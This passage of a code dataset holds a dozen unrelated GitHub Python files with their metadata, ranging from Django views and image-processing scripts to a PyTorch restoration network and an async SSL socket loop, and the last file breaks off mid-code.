print(e)\n","repo_name":"AI-General/ExpertGPT","sub_path":"expertgpt/backend/core/setup_qdrant.py","file_name":"setup_qdrant.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13473563016","text":"# from smb.SMBConnection import SMBConnection\nfrom django.shortcuts import render\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom .serializers import FileUploadSerializer, FileValidateSerializer\nfrom lsvalidate.models import LsRecord\nfrom lsvalidate.tasks import ls_upload\nfrom django.conf import settings\n# Create your views here.\n\n\nclass LsUpload(viewsets.ViewSet):\n serializer_class = FileUploadSerializer\n def list(self, request):\n\n\n\n return Response({'response_text': 'hello'}, status=status.HTTP_200_OK)\n\n def create(self, request):\n file_uploaded = request.FILES.get('file')\n file_lines = file_uploaded.read().decode().splitlines()\n ls_upload.delay(file_lines)\n response = f\"POST API and you have uploaded a {file_uploaded} file\"\n return Response(response)\n\n def delete(self, request):\n response_text = 'No DEBUG. 
No data deleted.'\n if settings.DEBUG == 1:\n LsRecord.objects.all().delete()\n response_text = 'All data deleted'\n return Response({response_text})\n\n\nclass LsValidate(viewsets.ViewSet):\n serializer_class = FileValidateSerializer\n\n def list(self, request):\n return Response({'response_text': 'hello'}, status=status.HTTP_200_OK)\n\n def post(self, request):\n\n ls = request.data.get('ls')\n\n if len(ls) == 8:\n ls_record = LsRecord.objects.filter(account_number = ls)\n else:\n ls_record = LsRecord.objects.filter(account_number_rng = ls)\n\n response = False\n if len(ls_record) !=0:\n response = True\n\n return Response(response)","repo_name":"bitinfodoc/service_docker","sub_path":"mrgServices/lsvalidate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73277203992","text":"import torch\r\nimport argparse\r\nimport coremltools as ct\r\nfrom pathlib import Path\r\nimport sys\r\nsys.path.insert(0, '.')\r\nfrom models import *\r\n\r\n\r\ndef convert(model, variant, num_classes, checkpoint, size):\r\n \"\"\"\r\n Warning!!!! CoreML conversion will not work on Windows\r\n \"\"\"\r\n # create random input and initialize model\r\n inputs = torch.randn(1, 3, *size) \r\n pt_model = eval(model)(variant, checkpoint, num_classes, max(*size))\r\n pt_model.eval()\r\n\r\n # convert to torchscript model\r\n jit_model = torch.jit.trace(pt_model, inputs)\r\n\r\n # convert to coreml model\r\n core_ml_model = ct.convert(\r\n jit_model,\r\n inputs=[ct.ImageType('input', inputs.shape)],\r\n convert_to=\"neuralnetwork\"\r\n )\r\n\r\n # create save file \r\n checkpoint = Path(checkpoint)\r\n save_path = checkpoint.parent / f\"{checkpoint.name.split('.')[0]}.mlmodel\"\r\n\r\n # save model\r\n core_ml_model.save(save_path)\r\n print(f\"Finished converting and saved model at `{save_path}`\")\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--model', type=str, default=\"VAN\")\r\n parser.add_argument('--variant', type=str, default='S')\r\n parser.add_argument('--num_classes', type=int, default=1000)\r\n parser.add_argument('--checkpoint', type=str, default='/home/sithu/Documents/weights/backbones/van/van_small_811.pth.tar')\r\n parser.add_argument('--size', type=list, default=[224, 224])\r\n args = vars(parser.parse_args())\r\n convert(**args)","repo_name":"sithu31296/sota-backbones","sub_path":"convert/to_coreml.py","file_name":"to_coreml.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"5"} +{"seq_id":"1865056132","text":"\"web_navigator.py\"\n\nimport folium\nfrom geopy import Nominatim\nimport twitter2\n\ndef user_locations(data):\n \"Creates dictionary with user names and their locations\"\n res = dict()\n for user in data['users']:\n if len(user['location']) == 0:\n continue\n res[user['screen_name']] = user['location']\n return res\n\n\ndef coordinates(locations, geolocator):\n \"Transforms user locations into coordinates\"\n for loc in locations:\n coord = geolocator.geocode(locations[loc], timeout = None)\n if coord is None:\n continue\n locations[loc] = (coord.latitude, coord.longitude)\n return locations\n\n\ndef main(name):\n data = twitter2.get_data(name)\n location = user_locations(data)\n geolocator1 = Nominatim(user_agent=\"web_navigator.py\")\n coords = coordinates(location, geolocator1)\n\n new_map = folium.Map()\n\n layer 
= folium.FeatureGroup(name=\"friends locations\")\n for loc in coords:\n try:\n new_map.add_child(layer.add_child(folium.Marker(location=[coords[loc][0], \\\n coords[loc][1]], popup=loc)))\n except ValueError:\n continue\n\n new_map.save('mysite/templates/new_map.html')\n","repo_name":"akhynkokateryna/web-map-twitter","sub_path":"web_navigator.py","file_name":"web_navigator.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14574870536","text":"from algos.strings.count_volwes import vowel_counter\n\n\ndef test_volwe_counter():\n data = [\n 'abracadabra',\n 'pear tree',\n 'o a kak ushakov lil vo kashu kakao',\n 'my pyx'\n ]\n result = vowel_counter(data)\n assert result == '5 4 13 2'\n","repo_name":"myusko/algosproblems","sub_path":"tests/test_strings/test_volwe_counter.py","file_name":"test_volwe_counter.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72541697431","text":"#!/usr/bin/python\nimport Queue\nimport logging\nfrom copy import deepcopy\n\n#TODO: Fix this algo and merge with original serialized_frame_deliver\nfrom sprocket.stages.util import preprocess_config\n\n\ndef serialized_frame_with_empty_delivery_func(buffer_queues, deliver_queue, **kwargs):\n \"\"\"wait for first stage_conf['framesperchunk'] frames available frames to deliver, required for dash encode\"\"\"\n\n def merge_events(events, lineage):\n merged = {}\n sample = deepcopy(events[0])\n sample['frame_list']['metadata']['lineage'] = lineage\n\n klist = []\n for e in events:\n if e['frame_list']['key'] != None:\n klist.append(e['frame_list']['key'])\n merged['frame_list'] = {'metadata': deepcopy(sample['frame_list']['metadata']),\\\n 'type': deepcopy(sample['frame_list']['type']),\n 'key_list': klist}\n\n #if the leftover only consisted of empty frames\n if klist == []:\n merged = {}\n return {}\n else:\n return merged\n\n assert len(buffer_queues) == 1 # TODO: add validator when creating pipe\n stale = kwargs['stale']\n stage_conf = kwargs['stage_conf']\n stage_context = kwargs['stage_context']\n refreshed = False\n\n metadata = buffer_queues.values()[0].queue[0].values()[0]['metadata']\n expecting = stage_context.get('expecting', 1) # expecting lineage\n #print \"expecting\"\n #print expecting\n next_lineage = stage_context.get('next_lineage', 1)\n config = preprocess_config(stage_conf, {'fps': metadata['fps']})\n framesperchunk = config.get('framesperchunk', metadata['fps'])\n\n lst = []\n while not buffer_queues.values()[0].empty():\n lst.append(buffer_queues.values()[0].get())\n ordered_events = sorted(lst, key=lambda e: int(e.values()[0]['metadata']['lineage']) * 100000000 + e.values()[0][\n 'number'])\n start = 0\n while True:\n\n i = start\n fcount = start\n disregard = False\n\n if start + framesperchunk > len(ordered_events):\n break\n\n while i < (start + framesperchunk):\n #pdb.set_trace()\n\n #there is not enough extra events to cover for the empty ones\n if fcount == len(ordered_events):\n disregard = True\n break\n\n if int(ordered_events[fcount].values()[0]['metadata']['lineage']) != expecting:\n disregard = True\n break\n\n if 'Empty' in ordered_events[fcount].values()[0]:\n expecting+=1\n #do not increment i since this is empty\n fcount +=1\n continue\n\n if ordered_events[fcount].values()[0]['EOF']:\n expecting += 1\n\n fcount+=1\n i+=1\n\n\n if not disregard: # enough frames, merge and go!\n 
merged = merge_events(ordered_events[start:fcount], str(next_lineage))\n deliver_queue.put(merged)\n logging.info(\"delivered: %s\", merged)\n start += (framesperchunk + (fcount - i))\n next_lineage += 1\n refreshed = True\n stage_context['expecting'] = expecting # only when delivered should we update stage's expecting lineage\n continue\n break\n\n #print kwargs\n\n if refreshed or not stale:\n for e in ordered_events[start:]:\n buffer_queues.values()[0].put(e) # put them back\n\n else:\n # those are the only frames left, deliver\n merged = merge_events(ordered_events[start:], str(next_lineage))\n\n #If leftover had only empty frames\n if merged == {}:\n return\n\n deliver_queue.put(merged)\n logging.info(\"delivered leftover: %s\", merged)\n\n stage_context['next_lineage'] = next_lineage\n","repo_name":"excamera/pipeline","sub_path":"sprocket/delivery_function/serialzed_frame_with_empty_delivery_func.py","file_name":"serialzed_frame_with_empty_delivery_func.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"31535788502","text":"import os\n\nfrom eclinical.scaffold.template.file_operate import FileOperate\nfrom eclinical.scaffold.template.service import Service\n# from scaffold.template.service import Service\n\n\nclass GenService:\n def __init__(self, folder):\n self.folder = folder\n\n def add_service(self, service_names: str, app: str):\n for service_name in service_names.split(\",\"):\n service = Service(service_name, app)\n # write to service.py\n if not os.path.exists(os.path.join(self.folder, \"services\")): os.mkdir(\n os.path.join(self.folder, \"services\"))\n fop = FileOperate(self.folder)\n if fop.file_exist(\"services\", service.file_name):\n if input(f\"{service.service_name} already exists, overwrite? (Y/N)\") == 'N':\n continue\n fop.rewrite_file(\"services\", service.file_name + \".py\", service.output_service_py()) \\\n or fop.new_file(\"services\", service.file_name + \".py\", service.output_service_py())\n # write to __init__.py\n fop.append_file(\"services\", \"__init__.py\", service.output_init_py()) \\\n or fop.new_file(\"services\", \"__init__.py\", service.output_init_py())\n # write to conftest.py\n fop.append_file(\"\", \"conftest.py\", service.output_conftest_body_py()) \\\n or fop.new_file(\"\", \"conftest.py\", service.output_conftest_body_py())\n\n","repo_name":"thcpc/eclinical","sub_path":"scaffold/files/gen_service.py","file_name":"gen_service.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28348456011","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\ntry:\n import xmltodict\nexcept (ImportError, SystemError):\n raise SystemExit(\"Required Python module not found.\")\n\nimport argparse\nimport json\nimport os\n\n\ndef read_xml(input_path):\n snippet = False\n with open(input_path, \"r\", encoding=\"UTF-8\") as input_file:\n try:\n snippet = xmltodict.parse(input_file.read())[\"snippet\"]\n except Exception as err:\n print(err)\n\n return snippet\n\n\ndef format_snippet(snippet_json):\n description = snippet_json.get(\"description\", \"\")\n return (snippet_json.get(\"scope\", False), {\n \"trigger\": \"%s%s\" % (snippet_json.get(\"tabTrigger\", \"\"),\n \"\\t\" + description if description else \"\"),\n \"contents\": snippet_json.get(\"content\", \"\")\n })\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"folder_path\", 
type=str)\n\n args = parser.parse_args()\n snippet_files = []\n snippets_json = {}\n\n if os.path.isdir(args.folder_path):\n snippet_files = [os.path.join(args.folder_path, fp) for fp in os.listdir(\n args.folder_path) if fp.endswith(\".sublime-snippet\")]\n else:\n raise SystemExit(\"Path is not a folder:\\n%s\" % args.folder_path)\n\n for s in snippet_files:\n scope, completion = format_snippet(read_xml(s))\n\n if scope and completion.get(\"trigger\") and completion.get(\"contents\"):\n if scope not in snippets_json:\n snippets_json[scope] = []\n\n snippets_json[scope].append(completion)\n\n print(json.dumps(snippets_json, indent=4, separators=(\",\", \": \")))\n\n raise SystemExit(0)\n","repo_name":"Odyseus/OdyseusSublimePlugins","sub_path":"st_scripts/snippets_to_completions.py","file_name":"snippets_to_completions.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17448858461","text":"import matplotlib.pyplot as plt\nfrom openpyxl import load_workbook\n\ntabela_clientes = load_workbook(filename='tabelas/clientes_redes.xlsx')\npagamentos = tabela_clientes['aba_pagamentos']\n\nadimplentes = 0\ninadimplentes = 0\nfor pagamento in pagamentos.iter_rows(min_row=1, max_row=10,min_col=1, max_col=5):\n\tatrasado = pagamento[3].value\n\tif(atrasado == 'SIM'):\n\t\tinadimplentes = inadimplentes + 1\n\telse:\n\t\tadimplentes = adimplentes + 1\n\nvaloresX = [1, 2]\n\nvaloresY = [adimplentes, inadimplentes]\n\nnomes_barras = ['adimplentes', 'inadimplentes']\n\nplt.bar(valoresX, valoresY, tick_label = nomes_barras,\n\t\twidth = 0.8, color = ['green', 'red'])\n\nplt.xlabel('situação')\nplt.ylabel('quantidade')\nplt.title('Gráfico inadimplência')\n\nplt.show()\n","repo_name":"josedihego/python_redes","sub_path":"A07_planilhas_graficos.py","file_name":"A07_planilhas_graficos.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37098762206","text":"# não veja o código, apenas execute :)\r\n# apenas,\r\n# execute. \r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# ,-,\r\n# /.(\r\n# \\ {\r\n# `-`\r\n#\r\n#\r\n#\r\n# apenas relaxe...\r\n# . * . . .\r\n# . _ . . . .\r\n# . . _ / | . . * _ . .\r\n# | \\_| | | | __\r\n# _ | | _ | |/ |\r\n# | \\ | ____ | | / | \\\r\n# | | \\ +/_\\/_\\+ | | / | \\\r\n# _/____\\--...\\___ \\_||_/ ___...|__\\-..|____\\____/__\r\n# . . |_|__|_| . .\r\n# . . . _/ /__\\ \\_ . .\r\n# . . . . 
.\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\nfrom time import sleep\r\n\r\nwhile True:\r\n description = input(\"você poderia descrever como você se sente em uma palavra?\\nex: triste, feliz, cansado.\\n- \")\r\n\r\n list_of_words = description.split()\r\n\r\n feelings_list = []\r\n encouragement_list = []\r\n counter = 0\r\n\r\n for each_word in list_of_words:\r\n\r\n if each_word == \"triste\":\r\n feelings_list.append(\"triste\")\r\n encouragement_list.append(\"que amanhã será um dia melhor.\")\r\n counter += 1\r\n if each_word == \"feliz\":\r\n feelings_list.append(\"feliz\")\r\n encouragement_list.append(\"de continuar sorrindo.\")\r\n counter += 1\r\n if each_word == \"cansado\":\r\n feelings_list.append(\"cansado\")\r\n encouragement_list.append(\"você é mais forte do que pensa.\")\r\n counter += 1\r\n\r\n if counter == 0:\r\n\r\n output = \"eu não entendi, pode usar uma palavra diferente?\"\r\n\r\n elif counter == 1:\r\n\r\n output = \"parece que você está se sentindo bastante \" + \\\r\n feelings_list[0] + \". no entanto, lembre-se \" + \\\r\n encouragement_list[0] + \" espero que você se sinta melhor :)\"\r\n\r\n else:\r\n\r\n feelings = \"\"\r\n for i in range(len(feelings_list)-1):\r\n feelings += feelings_list[i] + \", \"\r\n feelings += \"e \" + feelings_list[-1]\r\n\r\n encouragement = \"\"\r\n for j in range(len(encouragement_list)-1):\r\n encouragement += encouragement_list[j] + \", \"\r\n encouragement += \"e \" + encouragement_list[-1]\r\n\r\n output = \"parece que você está se sentindo bastante \" + feelings + \\\r\n \". por favor, lembre-se sempre \" + encouragement + \" espero que você se sinta melhor :)\"\r\n\r\n print()\r\n print()\r\n print()\r\n sleep(3)\r\n print(\"hmmmm\")\r\n sleep(1)\r\n print(\"...\")\r\n sleep(1.5)\r\n print(\"você se sente \" + feelings_list[0] + \"?\")\r\n sleep(2)\r\n print(output)\r\n sleep(10)\r\n print()\r\n print()\r\n print()","repo_name":"iamjunioru/para-incentivar-alguem","sub_path":"para-vc.py","file_name":"para-vc.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"37692399476","text":"from datetime import datetime\n\ndef date_time(text: str) -> str:\n text = datetime.strptime(text, \"%d.%m.%Y %H:%M\")\n minute = \"minute\" if text.minute == 1 else \"minutes\"\n hour = \"hour\" if text.hour == 1 else \"hours\"\n return text.strftime(f\"%#d %B %Y year %#H {hour} %#M {minute}\")\n\nprint(\"Example:\")\nprint(date_time(\"01.01.2000 00:00\"))\n\nassert date_time(\"01.01.2000 00:00\") == \"1 January 2000 year 0 hours 0 minutes\"\nassert date_time(\"09.05.1945 06:07\") == \"9 May 1945 year 6 hours 7 minutes\"\n\nprint(\"The mission is done! 
Click 'Check Solution' to earn rewards!\")\n","repo_name":"FF3ADF61DD5F28BBCDD7F41A2313A8AB/Python_test","sub_path":"timeconverter.py","file_name":"timeconverter.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9141395927","text":"import cv2 as cv\nimport numpy as np\nimport argparse\nfrom pathlib import Path\n\nx_global = -1\ny_global = -1\n\n###############################################\ndef mouse_callback(event, x, y, flags, param):\n global x_global, y_global\n if event == cv.EVENT_LBUTTONDOWN:\n x_global, y_global = x, y\n print(x_global)\n###############################################\ndef crop_around_clicked(image: np.ndarray) -> np.ndarray:\n\n # Create a window for displaying the image\n cv.namedWindow('part 1 of 9')\n\n # Set the mouse callback function\n cv.setMouseCallback('part 1 of 9', mouse_callback)\n\n # Display the image\n cv.imshow('part 1 of 9', image)\n\n while True:\n\n k = cv.waitKey(1)\n if k == ord('q'):\n break\n\n # Close all windows\n cv.destroyAllWindows()\n #crop using clicked coordinates (numpy indexing is [row=y, col=x])\n print(x_global, y_global)\n im = image[y_global - 50:y_global + 50, x_global - 50:x_global + 50]\n return im\n\n\ndef scale_by_half_using_numpy_slicing(image: np.ndarray) -> np.ndarray:\n im = image[::2, ::2]\n return im\n\ndef scale_by_half_using_cv_resize(image: np.ndarray) -> np.ndarray:\n height, width, _ = image.shape\n\n new_height = height // 2\n new_width = width // 2\n im = cv.resize(image, (new_width, new_height))\n return im\n\ndef horizontal_mirror_image(image: np.ndarray) -> np.ndarray:\n #flip rows\n im = image[::-1]\n return im\n\ndef rotate_counterclockwise_90(image: np.ndarray) -> np.ndarray:\n # Rotate the image 90 degrees counterclockwise using np.transpose\n #counterclockwise (flipping x and y axis and not the BGR one(2))\n im = np.transpose(image, (1, 0, 2))\n #flip over vertical axis if clockwise required\n # im = im[:, ::-1, :]\n return im\n\ndef swap_b_r(image: np.ndarray) -> np.ndarray:\n # Split the channels\n b, g, r = cv.split(image)\n\n # Swap the Blue and Red channels\n im = cv.merge((r, g, b))\n return im\n\ndef invert_hue_ab(image: np.ndarray) -> np.ndarray:\n # Convert the image to LAB color space\n lab_image = cv.cvtColor(image, cv.COLOR_BGR2LAB)\n\n # Split the LAB image into channels\n l, a, b = cv.split(lab_image)\n\n # Invert the \"a\" channel and the \"b\" channel\n inverted_a = 255 - a\n inverted_b = 255 - b\n\n # Merge the inverted channels back into the LAB image\n inverted_lab_image = cv.merge((l, inverted_a, inverted_b))\n\n # # Convert the inverted LAB image back to BGR color space\n inverted_bgr_image = cv.cvtColor(inverted_lab_image, cv.COLOR_LAB2BGR)\n\n return inverted_bgr_image\n\n\ndef main(args: argparse.Namespace) -> None:\n image = cv.imread(str(args.image))\n image1 = crop_around_clicked(image)\n cv.imwrite(\"clicked.jpg\", image1)\n\n image2 = scale_by_half_using_numpy_slicing(image)\n cv.imwrite(\"halfsize.jpg\", image2)\n\n image3 = scale_by_half_using_cv_resize(image)\n cv.imwrite(\"halfsize_cv.jpg\", image3)\n\n image4 = horizontal_mirror_image(image)\n cv.imwrite(\"flipped.jpg\", image4)\n\n image5 = rotate_counterclockwise_90(image)\n cv.imwrite(\"rotated.jpg\", image5)\n\n image6 = swap_b_r(image)\n cv.imwrite(\"swapped.jpg\", image6)\n\n image7 = invert_hue_ab(image)\n cv.imwrite(\"inverted_ab.jpg\", image7)\n\n# Code inside the if statement below will only be executed if the script is called\n# directly from the 
command line\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"image\", type=Path)\n args = parser.parse_args()\n\n if not args.image.exists():\n print(f\"File {args.image} not found\")\n exit(1)\n\n main(args)\n","repo_name":"deepikaKini/CSCI-631-Computer-Vision","sub_path":"02 - Image processing/Numpy Operations/image_manipulation.py","file_name":"image_manipulation.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21353285673","text":"import torch\nimport torch.nn as nn\nfrom help_func.help_torch import RgbToYcbcr\nfrom help_func.help_torch import YcbcrToRgb\n\n\ndef make_model(args, parent=False):\n return _UUUU(args)\n # pass\n\n\nclass RDB_Conv(nn.Module):\n def __init__(self, inChannels, growRate, kSize=3):\n super(RDB_Conv, self).__init__()\n Cin = inChannels\n G = growRate\n self.conv = nn.Sequential(*[\n nn.Conv2d(Cin, G, kSize, padding=(kSize - 1) // 2, stride=1),\n nn.ReLU()\n ])\n\n def forward(self, x):\n out = self.conv(x)\n return torch.cat((x, out), 1)\n\n\nclass RDB(nn.Module):\n def __init__(self, growRate0, growRate, nConvLayers, kSize=3):\n super(RDB, self).__init__()\n G0 = growRate0\n G = growRate\n C = nConvLayers\n\n convs = []\n for c in range(C):\n convs.append(RDB_Conv(G0 + c * G, G))\n self.convs = nn.Sequential(*convs)\n\n # Local Feature Fusion\n self.LFF = nn.Conv2d(G0 + C * G, G0, 1, padding=0, stride=1)\n\n def forward(self, x):\n return self.LFF(self.convs(x)) + x\n\nclass _Base_UNet(nn.Module):\n def __init__(self, in_channels=256, out_channels=256, base_channels=256):\n super(_Base_UNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu1 = nn.PReLU()\n self.conv2 = nn.Conv2d(in_channels=base_channels + in_channels, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu2 = nn.PReLU()\n\n\n self.conv3 = nn.Conv2d(in_channels=base_channels*2 + in_channels, out_channels=base_channels*2, kernel_size=3,\n padding=1, stride=2, bias=False)\n self.relu3 = nn.PReLU()\n self.conv4 = nn.Conv2d(in_channels=base_channels*2, out_channels=base_channels*2, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu4 = nn.PReLU()\n\n self.conv5 = nn.Conv2d(in_channels=base_channels*4, out_channels=base_channels*4, kernel_size=3,\n padding=1, stride=2, bias=False)\n self.relu5 = nn.PReLU()\n self.conv6 = nn.Conv2d(in_channels=base_channels*4, out_channels=base_channels*4, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu6 = nn.PReLU()\n self.conv7 = nn.Conv2d(in_channels=base_channels*8, out_channels=base_channels*4, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu7 = nn.PReLU()\n\n self.conv_up1 = nn.ConvTranspose2d(base_channels * 4, base_channels * 2, kernel_size=4, stride=2, padding=1, bias=False)\n\n self.conv8 = nn.Conv2d(in_channels=base_channels * 2, out_channels=base_channels * 2, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu8 = nn.PReLU()\n self.conv9 = nn.Conv2d(in_channels=base_channels * 4, out_channels=base_channels * 2, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu9 = nn.PReLU()\n\n self.conv_up2 = nn.ConvTranspose2d(base_channels * 2, base_channels, kernel_size=4, stride=2, padding=1, bias=False)\n\n self.conv10 = nn.Conv2d(in_channels=base_channels, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, 
bias=False)\n self.relu10 = nn.PReLU()\n self.conv11 = nn.Conv2d(in_channels=base_channels*2, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu11 = nn.PReLU()\n\n self.conv12 = nn.Conv2d(in_channels=base_channels, out_channels=out_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n\n def forward(self, x):\n out0 = self.relu1(self.conv1(x))\n out = torch.cat([x, out0], dim=1)\n out1 = self.relu2(self.conv2(out))\n out = torch.cat([out, out1], dim=1)\n\n out = self.relu3(self.conv3(out))\n out2 = self.relu4(self.conv4(out))\n out = torch.cat([out, out2], dim=1)\n\n out = self.relu5(self.conv5(out))\n out3 = self.relu6(self.conv6(out))\n out = torch.cat([out, out3], dim=1)\n out = self.conv_up1(self.relu7(self.conv7(out)))\n\n out = torch.add(out2, out)\n out2 = self.relu8(self.conv8(out))\n out = torch.cat([out2, out], dim=1)\n out = self.conv_up2(self.relu9(self.conv9(out)))\n\n out = torch.add(out1, out)\n out1 = self.relu10(self.conv10(out))\n out = torch.cat([out, out1], dim=1)\n return torch.add(out0, self.conv12(self.relu11(self.conv11(out))))\n\nclass _UUUU(nn.Module):\n def __init__(self, args):\n super(_UUUU, self).__init__()\n # self.isjpg = 3\n self.isjpg = args.jpeg_grid_add\n if self.isjpg:\n input_channel = self.isjpg\n else:\n input_channel = 3\n self.rgb_to_yuv = RgbToYcbcr()\n self.conv_input = nn.Conv2d(in_channels=input_channel, out_channels=256, kernel_size=3, stride=1, padding=1, bias=False)\n self.relu1 = nn.PReLU()\n self.conv_down = nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, stride=2, padding=1, bias=False)\n self.relu2 = nn.PReLU()\n\n self.Unet1 = _Base_UNet()\n self.Unet2 = _Base_UNet()\n self.Unet3 = _Base_UNet()\n self.Unet4 = _Base_UNet()\n self.Unet5 = _Base_UNet()\n self.Unet6 = _Base_UNet()\n\n self.conv_bottle = nn.Conv2d(in_channels=256*7, out_channels=256, kernel_size=1, stride=1, padding=0, bias=False)\n\n self.num_dense = 4\n self.RDBs = nn.ModuleList()\n for i in range(self.num_dense):\n self.RDBs.append(\n RDB(growRate0=256, growRate=64, nConvLayers=8)\n )\n\n\n self.conv_mid = nn.Sequential(*[\n nn.Conv2d(self.num_dense*256 + 256, 256, 1, padding=0, stride=1),\n nn.Conv2d(256,256, kernel_size=3, padding=1, stride=1)\n ])\n\n self.upsampling = nn.PixelShuffle(2)\n\n self.conv_output = nn.Conv2d(in_channels=64, out_channels=3, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.yuv_to_rgb = YcbcrToRgb()\n\n def forward(self, x):\n yuv_input = self.rgb_to_yuv(x[:,:3,...])\n residual = yuv_input\n if self.isjpg:\n _input = torch.cat([yuv_input, x[:,3:,...]], dim=1)\n else:\n _input = yuv_input\n out = self.relu1(self.conv_input(_input))\n out = self.relu2(self.conv_down(out))\n\n outs = [out]\n outs.append(self.Unet1(outs[-1]))\n outs.append(self.Unet2(outs[-1]))\n outs.append(self.Unet3(outs[-1]))\n outs.append(self.Unet4(outs[-1]))\n outs.append(self.Unet5(outs[-1]))\n outs.append(self.Unet6(outs[-1]))\n\n out = self.conv_bottle(torch.cat(outs, dim=1))\n\n RDBs_out = [out]\n for i in range(self.num_dense):\n out = self.RDBs[i](out)\n RDBs_out.append(out)\n\n\n out = self.conv_mid(torch.cat(RDBs_out, dim=1))\n out = self.upsampling(out)\n out = self.conv_output(out)\n out = torch.add(out, residual)\n\n out = self.yuv_to_rgb(out)\n return out\n\n\n\n\nif __name__ == '__main__':\n from my_torchsummary import summary\n\n m = _UUUU(1).cuda()\n\n # inpt = torch.randn((1,5,96,96)).cuda()\n # while True:\n # m(inpt)\n torch.set_grad_enabled(False)\n m.eval()\n summary(m, (3, 1280, 
720))\n\n\n\n\n\n\n\n","repo_name":"tuzm24/Ntire2021","sub_path":"model/uuuu.py","file_name":"uuuu.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5303583597","text":"import selectors\nimport socket\nimport ssl\n\nclass Future:\n def __init__(self) -> None:\n self.result = None\n self._callback = None\n\n def set_done_callback(self, fn):\n self._callback = fn\n\n def set_result(self, result):\n self.result = result\n self._callback(self)\n\n\nclass Task:\n def __init__(self, coroutine) -> None:\n self.coroutine = coroutine\n self.step()\n self.done = False\n\n def step(self, future=None):\n try:\n if future is None:\n next_future = self.coroutine.send(None)\n else:\n next_future = self.coroutine.send(future.result)\n except StopIteration:\n self.done = True\n return\n\n next_future.set_done_callback(self.step)\n\nclass AsyncSocket:\n def __init__(self, hostname):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setblocking(False)\n self.future = Future()\n self.hostname = hostname\n\n def get_fd(self):\n return self.sock\n\n def on_read(self):\n self.future.set_result(None)\n\n def on_write(self):\n self.future.set_result(None)\n\n def get_future(self):\n return self.future\n\n def connect(self):\n try:\n self.sock.connect((self.hostname, 443))\n except BlockingIOError:\n pass\n\n yield self.future\n\n yield from self._do_handshake()\n\n def _do_handshake(self):\n # convert to ssl connection\n context = ssl.SSLContext(ssl.PROTOCOL_TLS)\n context.verify_mode = ssl.CERT_REQUIRED\n context.check_hostname = True\n context.load_default_certs()\n self.sock = context.wrap_socket(self.sock,\n server_hostname=self.hostname,\n do_handshake_on_connect=False)\n # Do handshake\n while True:\n try:\n self.sock.do_handshake()\n break\n except ssl.SSLWantReadError:\n pass\n except ssl.SSLWantWriteError:\n pass\n\n yield self.future\n\n def read(self):\n response = b''\n while True:\n try:\n yield self.future # 等待 Read 事件, 當有 READ 的事件時,就會被 Resume\n chunk = self.sock.recv(4096)\n if chunk:\n response += chunk\n else:\n return response\n except ssl.SSLWantReadError:\n # 忽略 ssl socket 的內容不足的錯誤\n pass\n\n def write(self, message):\n self.sock.write(message) \n\nclass Loop:\n def __init__(self):\n self.selector = selectors.DefaultSelector()\n self.tasks = []\n\n def create_socket(self, hostname):\n socket = AsyncSocket(hostname)\n self.selector.register(socket.get_fd(), selectors.EVENT_READ | selectors.EVENT_WRITE, socket)\n return socket\n\n def create_task(self, coroutine):\n task = Task(coroutine)\n self.tasks.append(task)\n return task\n\n def is_done(self):\n for task in self.tasks:\n if task.done is False:\n return False\n\n return True\n\n def 